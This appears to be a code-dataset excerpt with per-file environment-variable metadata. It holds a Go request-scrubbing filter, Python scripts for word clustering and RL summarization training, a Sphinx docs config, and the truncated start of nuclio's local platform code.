if ct := i.Request.Headers.Get("Content-Type"); ct == "application/json" {
data := map[string]interface{}{}
err := json.Unmarshal([]byte(i.Request.Body), &data)
if err != nil {
return err
}
delete(data, "api_key")
delete(data, "api_secret")
bodyBytes, err := json.Marshal(&data)
if err != nil {
return err
}
i.Request.Body = string(bodyBytes)
} else if ct == "application/x-www-form-urlencoded" {
i.Request.Form.Del("api_key")
i.Request.Form.Del("api_secret")
urlValues, err := url.ParseQuery(i.Request.Body)
if err != nil {
return err
}
urlValues.Del("api_key")
urlValues.Del("api_secret")
i.Request.Body = urlValues.Encode()
}
return nil
}
|
[
"\"NEXMO_API_KEY\"",
"\"NEXMO_API_SECRET\"",
"\"NEXMO_PRIVATE_KEY_PATH\"",
"\"NEXMO_APPLICATION_ID\""
] |
[] |
[
"NEXMO_APPLICATION_ID",
"NEXMO_PRIVATE_KEY_PATH",
"NEXMO_API_KEY",
"NEXMO_API_SECRET"
] |
[]
|
["NEXMO_APPLICATION_ID", "NEXMO_PRIVATE_KEY_PATH", "NEXMO_API_KEY", "NEXMO_API_SECRET"]
|
go
| 4 | 0 | |
tools/test.py
|
import json
from tqdm import tqdm
import os
from sklearn import metrics
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn.datasets.samples_generator import make_blobs
import numpy as np
import torch
import pickle
def get_imgid2object():
input_file_path = '/m/liyz/sg_matching/s2g/spice/coco_output/merged.json'
data = json.load(open(input_file_path))
print('total caption number is {}'.format(len(data)))
all_obj = {}
imgid2objs = {}
for info in tqdm(data):
img_id = info['image_id'].split('_')[0]
ref_tuples = info['ref_tuples']
if img_id not in imgid2objs:
imgid2objs[img_id] = set()
for tuple in ref_tuples:
if len(tuple['tuple']) == 1:
obj = tuple['tuple'][0]
imgid2objs[img_id].add(obj)
all_obj[obj] = all_obj.get(obj, 0) + 1
print('total image id number is {}'.format(len(imgid2objs)))
print('total objects number is {}'.format(len(all_obj)))
for imgid, objs in imgid2objs.items():
objs = list(objs)
imgid2objs[imgid] = objs
imgid2objs_save_path = './coco_imgid2objs.json'
json.dump(imgid2objs, open(imgid2objs_save_path, 'w'))
print('save to {} successfully.'.format(imgid2objs_save_path))
all_obj_save_path = './coco_obj_freq.json'
json.dump(all_obj, open(all_obj_save_path, 'w'))
print('save to {} successfully.'.format(all_obj_save_path))
def kmeans(data, k_cluster=1000):
# X, y = make_blobs(n_samples=100, n_features=2, centers=[[-1, -1], [0, 0], [1, 1], [2, 2]],
# cluster_std=[0.4, 0.2, 0.2, 0.2], random_state=9)
# print(X.shape)
    # plt.scatter(X[:, 0], X[:, 1], marker='o')  # assume the y labels are unknown: do not pass c=y, just cluster with k-means
# plt.show()
# X=torch.randn(500,200).numpy()
print('the input data shape is: ', data.shape)
X = data
y_pred = KMeans(n_clusters=k_cluster, random_state=9).fit_predict(X)
print('output result shape is ', y_pred.shape)
# print(y_pred)
# plt.scatter(X[:, 0], X[:, 1], c=y_pred)
# plt.show()
return y_pred
def load_vector_dict(vector_file_path):
print('loading glove vector file...')
pickle_file_path = vector_file_path + '_pickle.pkl'
word2vector = {}
if os.path.exists(pickle_file_path):
word2vector = pickle.load(open(pickle_file_path, 'rb'))
print('load from pickle directly')
else:
with open(vector_file_path, 'r') as f:
for line in tqdm(f.readlines()):
line = line.strip()
infos = line.split()
word = infos[0]
vec = np.array([float(x) for x in infos[1:]])
word2vector[word] = vec
pickle.dump(word2vector, open(pickle_file_path, 'wb'))
print('save dict file into pickle file: {}'.format(pickle_file_path))
vec_dim = word2vector['hello'].shape[0]
print('reading glove vector file finished... vector dimension is {}'.format(vec_dim))
# print(len(word2vector),word2vector['hello'])
# print(word2vector['hammer'])
return word2vector, vec_dim
def get_all_obj(obj_freq_file, word2vec, threshold):
obj2freq = json.load(open(obj_freq_file))
# print(word2vec.keys())
used_obj = []
used_vectors = []
for obj, cnt in obj2freq.items():
if cnt>=threshold and obj in word2vec:
# print(obj)
used_obj.append(obj)
used_vectors.append(word2vec[obj])
print(len(used_obj),len(used_vectors))
print('using threshold {}, the useful object number is {}'.format(threshold, len(used_obj)))
used_vectors = np.stack(used_vectors, axis=0)
return used_obj, used_vectors
def get_clustered_result(glove_file_path, obj_freq_file_path, save_word2clus_id_path, save_clus_id2words,
k_cluster=1000):
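    """Cluster the frequent object words by their GloVe vectors into k_cluster groups and dump the word/cluster mappings to JSON."""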
word2vec,vec_dim = load_vector_dict(vector_file_path=glove_file_path)
used_obj, used_vectors = get_all_obj(obj_freq_file=obj_freq_file_path, word2vec=word2vec, threshold=10)
    clustered_idxs = kmeans(used_vectors, k_cluster=k_cluster)
word2clus_id = {}
clus_id2words = {i: [] for i in range(k_cluster)}
for i in range(len(used_obj)):
word = used_obj[i]
idx = int(clustered_idxs[i])
word2clus_id[word] = idx
clus_id2words[idx].append(word)
json.dump(word2clus_id, open(save_word2clus_id_path, 'w'))
json.dump(clus_id2words, open(save_clus_id2words, 'w'))
print('finished.........')
glove_file_path='/S4/MI/liyz/data/glove/glove.6B.200d.txt'
obj_freq_file_path='/S4/MI/liyz/saem_retrieval/data/cocoid2obj/coco_obj_freq.json'
save_word2clus_id_path='/S4/MI/liyz/saem_retrieval/data/cocoid2obj/obj_to_clustered_id.json'
save_clus_id2words='/S4/MI/liyz/saem_retrieval/data/cocoid2obj/clustered_id_to_obj.json'
get_clustered_result(glove_file_path,obj_freq_file_path,save_word2clus_id_path,save_clus_id2words,k_cluster=1000)
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
train_full_rl.py
|
""" full training (train rnn-ext + abs + RL) """
import argparse
import json
import pickle as pkl
import os
from os.path import join, exists
from itertools import cycle
from toolz.sandbox.core import unzip
from cytoolz import identity
import torch
from torch import optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch.utils.data import DataLoader
from data.data import CnnDmDataset
from data.batcher import tokenize
from model.rl import ActorCritic
from model.extract import PtrExtractSumm
from training import BasicTrainer
from rl import get_grad_fn
from rl import A2CPipeline
from decoding import load_best_ckpt
from decoding import Abstractor, ArticleBatcher
from metric import compute_rouge_l, compute_rouge_n, compute_bertscore
MAX_ABS_LEN = 30
try:
DATA_DIR = os.environ['DATA']
except KeyError:
    print('please use environment variable to specify data directories')
    raise
class RLDataset(CnnDmDataset):
""" get the article sentences only (for decoding use)"""
def __init__(self, split, cross_rev_bucket=None):
super().__init__(split, DATA_DIR, cross_rev_bucket=cross_rev_bucket)
def __getitem__(self, i):
js_data = super().__getitem__(i)
art_sents = js_data['article']
abs_sents = js_data['abstract']
return art_sents, abs_sents
def load_ext_net(ext_dir):
ext_meta = json.load(open(join(ext_dir, 'meta.json')))
assert ext_meta['net'] == 'ml_rnn_extractor'
ext_ckpt = load_best_ckpt(ext_dir)
ext_args = ext_meta['net_args']
vocab = pkl.load(open(join(ext_dir, 'vocab.pkl'), 'rb'))
ext = PtrExtractSumm(**ext_args)
ext.load_state_dict(ext_ckpt)
return ext, vocab
def configure_net(abs_dir, ext_dir, cuda):
""" load pretrained sub-modules and build the actor-critic network"""
# load pretrained abstractor model
if abs_dir is not None:
abstractor = Abstractor(abs_dir, MAX_ABS_LEN, cuda)
else:
abstractor = identity
    # load ML trained extractor net and build RL agent
extractor, agent_vocab = load_ext_net(ext_dir)
agent = ActorCritic(extractor._sent_enc,
extractor._art_enc,
extractor._extractor,
ArticleBatcher(agent_vocab, cuda))
if cuda:
agent = agent.cuda()
net_args = {}
net_args['abstractor'] = (None if abs_dir is None
else json.load(open(join(abs_dir, 'meta.json'))))
net_args['extractor'] = json.load(open(join(ext_dir, 'meta.json')))
return agent, agent_vocab, abstractor, net_args
def configure_training(opt, lr, clip_grad, lr_decay, batch_size,
gamma, reward, stop_coeff, stop_reward):
assert opt in ['adam']
opt_kwargs = {}
opt_kwargs['lr'] = lr
train_params = {}
train_params['optimizer'] = (opt, opt_kwargs)
train_params['clip_grad_norm'] = clip_grad
train_params['batch_size'] = batch_size
train_params['lr_decay'] = lr_decay
train_params['gamma'] = gamma
train_params['reward'] = reward
train_params['stop_coeff'] = stop_coeff
train_params['stop_reward'] = stop_reward
return train_params
def build_batchers(batch_size, cross_rev_bucket=None):
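    """Build a cycled training loader and a validation loader over tokenized (article, abstract) pairs."""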
def coll(batch):
art_batch, abs_batch = unzip(batch)
art_sents = list(filter(bool, map(tokenize(None), art_batch)))
abs_sents = list(filter(bool, map(tokenize(None), abs_batch)))
return art_sents, abs_sents
loader = DataLoader(
RLDataset('train', cross_rev_bucket=cross_rev_bucket), batch_size=batch_size,
shuffle=True, num_workers=4,
collate_fn=coll
)
val_loader = DataLoader(
RLDataset('val'), batch_size=batch_size,
shuffle=False, num_workers=4,
collate_fn=coll
)
return cycle(loader), val_loader
def train(args):
if not exists(args.path):
os.makedirs(args.path)
# make net
agent, agent_vocab, abstractor, net_args = configure_net(
args.abs_dir, args.ext_dir, args.cuda)
# configure training setting
assert args.stop > 0
train_params = configure_training(
'adam', args.lr, args.clip, args.decay, args.batch,
args.gamma, args.reward, args.stop, 'rouge-1'
)
train_batcher, val_batcher = build_batchers(args.batch, cross_rev_bucket=args.cross_rev_bucket)
reward_fn = compute_rouge_l
stop_reward_fn = compute_rouge_n(n=1)
# # reward_fn = compute_rouge_l
# reward_fn = compute_bertscore
# reward_fn.metric = datasets.load_metric('bertscore')
# stop_reward_fn = reward_fn
# save abstractor binary
if args.abs_dir is not None:
abs_ckpt = {}
abs_ckpt['state_dict'] = load_best_ckpt(args.abs_dir)
abs_vocab = pkl.load(open(join(args.abs_dir, 'vocab.pkl'), 'rb'))
abs_dir = join(args.path, 'abstractor')
os.makedirs(join(abs_dir, 'ckpt'))
with open(join(abs_dir, 'meta.json'), 'w') as f:
json.dump(net_args['abstractor'], f, indent=4)
torch.save(abs_ckpt, join(abs_dir, 'ckpt/ckpt-0-0'))
with open(join(abs_dir, 'vocab.pkl'), 'wb') as f:
pkl.dump(abs_vocab, f)
# save configuration
meta = {}
meta['net'] = 'rnn-ext_abs_rl'
meta['net_args'] = net_args
meta['train_params'] = train_params
with open(join(args.path, 'meta.json'), 'w') as f:
json.dump(meta, f, indent=4)
with open(join(args.path, 'agent_vocab.pkl'), 'wb') as f:
pkl.dump(agent_vocab, f)
# prepare trainer
grad_fn = get_grad_fn(agent, args.clip)
optimizer = optim.Adam(agent.parameters(), **train_params['optimizer'][1])
scheduler = ReduceLROnPlateau(optimizer, 'max', verbose=True,
factor=args.decay, min_lr=0,
patience=args.lr_p)
pipeline = A2CPipeline(meta['net'], agent, abstractor,
train_batcher, val_batcher,
optimizer, grad_fn,
reward_fn, args.gamma,
stop_reward_fn, args.stop)
trainer = BasicTrainer(pipeline, args.path,
args.ckpt_freq, args.patience, scheduler,
val_mode='score')
print('start training with the following hyper-parameters:')
print(meta)
trainer.train()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='program for full RL training (rnn-ext + abs)'
)
parser.add_argument('--path', required=True, help='root of the model')
parser.add_argument('--cross-rev-bucket', default=None,
help='cross review bucket id if training agent to get difficulty scores for summarization')
# model options
parser.add_argument('--abs_dir', action='store',
help='pretrained summarizer model root path')
parser.add_argument('--ext_dir', action='store',
help='root of the extractor model')
parser.add_argument('--ckpt', type=int, action='store', default=None,
help='checkpoint used for decoding')
# training options
parser.add_argument('--reward', action='store', default='rouge-l',
help='reward function for RL')
parser.add_argument('--lr', type=float, action='store', default=1e-4,
help='learning rate')
parser.add_argument('--decay', type=float, action='store', default=0.5,
help='learning rate decay ratio')
parser.add_argument('--lr_p', type=int, action='store', default=0,
help='patience for learning rate decay')
parser.add_argument('--gamma', type=float, action='store', default=0.95,
help='discount factor of RL')
parser.add_argument('--stop', type=float, action='store', default=1.0,
help='stop coefficient for rouge-1')
parser.add_argument('--clip', type=float, action='store', default=2.0,
help='gradient clipping')
parser.add_argument('--batch', type=int, action='store', default=32,
help='the training batch size')
parser.add_argument(
'--ckpt_freq', type=int, action='store', default=1000,
help='number of update steps for checkpoint and validation'
)
parser.add_argument('--patience', type=int, action='store', default=3,
help='patience for early stopping')
parser.add_argument('--no-cuda', action='store_true',
help='disable GPU training')
args = parser.parse_args()
args.cuda = torch.cuda.is_available() and not args.no_cuda
train(args)
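# A minimal usage sketch (hypothetical paths; assumes an abstractor and an
# extractor pretrained by the earlier stages, and the DATA environment variable
# pointing at the preprocessed dataset):
#
#   DATA=/path/to/dataset python train_full_rl.py \
#       --path saved/full_rl --abs_dir saved/abstractor --ext_dir saved/extractor \
#       --batch 32 --reward rouge-l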
|
[] |
[] |
[
"DATA"
] |
[]
|
["DATA"]
|
python
| 1 | 0 | |
docs/conf.py
|
# -*- coding: utf-8 -*-
# flake8: noqa
# tensorpack documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 27 01:41:24 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os, re
import mock
import inspect
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
os.environ['DOC_BUILDING'] = '1'
ON_RTD = (os.environ.get('READTHEDOCS') == 'True')
MOCK_MODULES = ['tabulate', 'h5py',
'cv2', 'zmq', 'lmdb',
'sklearn', 'sklearn.datasets',
'scipy', 'scipy.misc', 'scipy.io',
'tornado', 'tornado.concurrent',
'horovod', 'horovod.tensorflow',
'pyarrow',
'subprocess32', 'functools32']
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = mock.Mock(name=mod_name)
sys.modules['cv2'].__version__ = '3.2.1' # fake version
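# Note (illustrative): registering Mock objects above lets autodoc import
# tensorpack on Read the Docs without installing the heavy optional dependencies
# (OpenCV, lmdb, horovod, ...); e.g. "import cv2" inside tensorpack resolves to
# the Mock registered here, with the fake __version__ set just above.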
import tensorpack
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.4'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.napoleon',
#'sphinx.ext.autosectionlabel',
#'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
# -- Configurations for plugins ------------
napoleon_google_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_special_with_doc = True
napoleon_numpy_docstring = False
napoleon_use_rtype = False
if ON_RTD:
intersphinx_timeout = 10
else:
# skip this when building locally
intersphinx_timeout = 0.1
intersphinx_mapping = {'python': ('https://docs.python.org/3.6', None)}
# -------------------------
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# to support markdown
from recommonmark.parser import CommonMarkParser
source_parsers = {
'.md': CommonMarkParser,
}
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
source_suffix = ['.rst', '.md']
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'tensorpack'
copyright = u'2015 - 2018, Yuxin Wu, et al.'
author = u'Yuxin Wu, et al.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = tensorpack.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['build', 'README.md']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# 'tensorpack.' prefix was removed by js
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['tensorpack.']
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {}
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# avoid li fonts being larger
# TODO but li indices fonts are still larger
html_compact_lists = False
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'tensorpackdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'tensorpack.tex', u'tensorpack documentation',
author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tensorpack', u'tensorpack documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'tensorpack', u'tensorpack documentation',
author, 'tensorpack', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
suppress_warnings = ['image.nonlocal_uri']
#autodoc_member_order = 'bysource'
def process_signature(app, what, name, obj, options, signature,
return_annotation):
if signature:
# replace Mock function names
signature = re.sub('<Mock name=\'([^\']+)\'.*>', '\g<1>', signature)
signature = re.sub('tensorflow', 'tf', signature)
# add scope name to layer signatures:
if hasattr(obj, 'use_scope') and hasattr(obj, 'symbolic_function'):
if obj.use_scope:
signature = signature[0] + 'scope_name, ' + signature[1:]
elif obj.use_scope is None:
signature = signature[0] + '[scope_name,] ' + signature[1:]
# signature: arg list
return signature, return_annotation
_DEPRECATED_NAMES = set([
# deprecated stuff:
'TryResumeTraining',
'QueueInputTrainer',
'SimplePredictBuilder',
'LMDBDataPoint',
'TFRecordData',
'dump_dataflow_to_lmdb',
'dump_dataflow_to_tfrecord',
# renamed stuff:
'DumpTensor',
'DumpParamAsImage',
'StagingInputWrapper',
'PeriodicRunHooks',
'get_nr_gpu',
# deprecated or renamed symbolic code
'ImageSample',
'Deconv2D',
'get_scalar_var', 'psnr',
'prediction_incorrect', 'huber_loss',
# internal only
'apply_default_prefetch',
'average_grads',
'aggregate_grads',
'allreduce_grads',
'PrefetchOnGPUs',
])
def autodoc_skip_member(app, what, name, obj, skip, options):
# we hide something deliberately
if getattr(obj, '__HIDE_SPHINX_DOC__', False):
return True
if name == '__init__':
if obj.__doc__ and skip:
# include_init_with_doc doesn't work well for decorated init
# https://github.com/sphinx-doc/sphinx/issues/4258
return False
# Hide some names that are deprecated or not intended to be used
if name in _DEPRECATED_NAMES:
return True
if name in ['get_data', 'size', 'reset_state']:
# skip these methods with empty docstring
if not obj.__doc__ and inspect.isfunction(obj):
# https://stackoverflow.com/questions/3589311/get-defining-class-of-unbound-method-object-in-python-3
cls = getattr(inspect.getmodule(obj),
obj.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0])
if issubclass(cls, tensorpack.DataFlow):
return True
return None
def url_resolver(url):
if '.html' not in url:
return "https://github.com/tensorpack/tensorpack/blob/master/" + url
else:
if ON_RTD:
return "http://tensorpack.readthedocs.io/" + url
else:
return '/' + url
def setup(app):
from recommonmark.transform import AutoStructify
app.connect('autodoc-process-signature', process_signature)
app.connect('autodoc-skip-member', autodoc_skip_member)
app.add_config_value(
'recommonmark_config',
{'url_resolver': url_resolver,
'auto_toc_tree_section': 'Contents',
'enable_math': True,
'enable_inline_math': True,
'enable_eval_rst': True
}, True)
app.add_transform(AutoStructify)
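# A small, hedged illustration of the two autodoc hooks wired up above
# (hypothetical objects, not executed during the build):
#
#   process_signature(app, 'function', 'Conv2D', Conv2D, {}, '(x, out_channel)', None)
#       -> ('(scope_name, x, out_channel)', None)    # when Conv2D.use_scope is True
#   autodoc_skip_member(app, 'class', 'Deconv2D', Deconv2D, False, {})
#       -> True                                      # listed in _DEPRECATED_NAMES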
|
[] |
[] |
[
"DOC_BUILDING",
"READTHEDOCS"
] |
[]
|
["DOC_BUILDING", "READTHEDOCS"]
|
python
| 2 | 0 | |
pkg/platform/local/platform.go
|
/*
Copyright 2017 The Nuclio Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package local
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io/ioutil"
"net"
"os"
"path"
"strconv"
"time"
"github.com/nuclio/nuclio/pkg/cmdrunner"
"github.com/nuclio/nuclio/pkg/common"
"github.com/nuclio/nuclio/pkg/containerimagebuilderpusher"
"github.com/nuclio/nuclio/pkg/dockerclient"
"github.com/nuclio/nuclio/pkg/errors"
"github.com/nuclio/nuclio/pkg/functionconfig"
"github.com/nuclio/nuclio/pkg/platform"
"github.com/nuclio/nuclio/pkg/platform/abstract"
"github.com/nuclio/nuclio/pkg/processor"
"github.com/nuclio/nuclio/pkg/processor/config"
"github.com/nuclio/logger"
"github.com/nuclio/nuclio-sdk-go"
"github.com/nuclio/zap"
"golang.org/x/sync/errgroup"
)
type Platform struct {
*abstract.Platform
cmdRunner cmdrunner.CmdRunner
dockerClient dockerclient.Client
localStore *store
checkFunctionContainersHealthiness bool
functionContainersHealthinessTimeout time.Duration
functionContainersHealthinessInterval time.Duration
}
const Mib = 1048576
// NewPlatform instantiates a new local platform
func NewPlatform(parentLogger logger.Logger) (*Platform, error) {
newPlatform := &Platform{}
// create base
newAbstractPlatform, err := abstract.NewPlatform(parentLogger, newPlatform)
if err != nil {
return nil, errors.Wrap(err, "Failed to create abstract platform")
}
// init platform
newPlatform.Platform = newAbstractPlatform
// function containers healthiness check is disabled by default
newPlatform.checkFunctionContainersHealthiness = common.GetEnvOrDefaultBool("NUCLIO_CHECK_FUNCTION_CONTAINERS_HEALTHINESS", false)
newPlatform.functionContainersHealthinessTimeout = time.Second * 5
newPlatform.functionContainersHealthinessInterval = time.Second * 30
// create a command runner
if newPlatform.cmdRunner, err = cmdrunner.NewShellRunner(newPlatform.Logger); err != nil {
return nil, errors.Wrap(err, "Failed to create command runner")
}
if newPlatform.ContainerBuilder, err = containerimagebuilderpusher.NewDocker(newPlatform.Logger); err != nil {
return nil, errors.Wrap(err, "Failed to create containerimagebuilderpusher")
}
// create a docker client
if newPlatform.dockerClient, err = dockerclient.NewShellClient(newPlatform.Logger, nil); err != nil {
return nil, errors.Wrap(err, "Failed to create docker client")
}
// create a local store for configs and stuff
if newPlatform.localStore, err = newStore(parentLogger, newPlatform, newPlatform.dockerClient); err != nil {
return nil, errors.Wrap(err, "Failed to create local store")
}
// ignite goroutine to check function container healthiness
if newPlatform.checkFunctionContainersHealthiness {
newPlatform.Logger.DebugWith("Igniting container healthiness validator")
go func(newPlatform *Platform) {
uptimeTicker := time.NewTicker(newPlatform.functionContainersHealthinessInterval)
for range uptimeTicker.C {
newPlatform.ValidateFunctionContainersHealthiness()
}
}(newPlatform)
}
return newPlatform, nil
}
// CreateFunction will simply run a docker image
func (p *Platform) CreateFunction(createFunctionOptions *platform.CreateFunctionOptions) (*platform.CreateFunctionResult, error) {
var previousHTTPPort int
var err error
var existingFunctionConfig *functionconfig.ConfigWithStatus
// wrap logger
logStream, err := abstract.NewLogStream("deployer", nucliozap.InfoLevel, createFunctionOptions.Logger)
if err != nil {
return nil, errors.Wrap(err, "Failed to create log stream")
}
// save the log stream for the name
p.DeployLogStreams[createFunctionOptions.FunctionConfig.Meta.GetUniqueID()] = logStream
// replace logger
createFunctionOptions.Logger = logStream.GetLogger()
if err := p.ValidateCreateFunctionOptions(createFunctionOptions); err != nil {
return nil, errors.Wrap(err, "Create function options validation failed")
}
// local currently doesn't support registries of any kind. remove push / run registry
createFunctionOptions.FunctionConfig.Spec.RunRegistry = ""
createFunctionOptions.FunctionConfig.Spec.Build.Registry = ""
// it's possible to pass a function without specifying any meta in the request, in that case skip getting existing function
if createFunctionOptions.FunctionConfig.Meta.Namespace != "" && createFunctionOptions.FunctionConfig.Meta.Name != "" {
existingFunctions, err := p.localStore.getFunctions(&createFunctionOptions.FunctionConfig.Meta)
if err != nil {
return nil, errors.Wrap(err, "Failed to get existing functions")
}
if len(existingFunctions) == 0 {
existingFunctionConfig = nil
} else {
// assume only one
existingFunction := existingFunctions[0]
// build function options
existingFunctionConfig = &functionconfig.ConfigWithStatus{
Config: *existingFunction.GetConfig(),
Status: *existingFunction.GetStatus(),
}
}
}
reportCreationError := func(creationError error) error {
createFunctionOptions.Logger.WarnWith("Create function failed, setting function status",
"err", creationError)
errorStack := bytes.Buffer{}
errors.PrintErrorStack(&errorStack, creationError, 20)
// cut messages that are too big
if errorStack.Len() >= 4*Mib {
errorStack.Truncate(4 * Mib)
}
// post logs and error
return p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: createFunctionOptions.FunctionConfig,
Status: functionconfig.Status{
State: functionconfig.FunctionStateError,
Message: errorStack.String(),
},
})
}
onAfterConfigUpdated := func(updatedFunctionConfig *functionconfig.Config) error {
createFunctionOptions.Logger.DebugWith("Creating shadow function",
"name", createFunctionOptions.FunctionConfig.Meta.Name)
// create the function in the store
if err = p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: createFunctionOptions.FunctionConfig,
Status: functionconfig.Status{
State: functionconfig.FunctionStateBuilding,
},
}); err != nil {
return errors.Wrap(err, "Failed to create function")
}
previousHTTPPort, err = p.deletePreviousContainers(createFunctionOptions)
if err != nil {
return errors.Wrap(err, "Failed to delete previous containers")
}
// indicate that the creation state has been updated. local platform has no "building" state yet
if createFunctionOptions.CreationStateUpdated != nil {
createFunctionOptions.CreationStateUpdated <- true
}
return nil
}
onAfterBuild := func(buildResult *platform.CreateFunctionBuildResult, buildErr error) (*platform.CreateFunctionResult, error) {
if buildErr != nil {
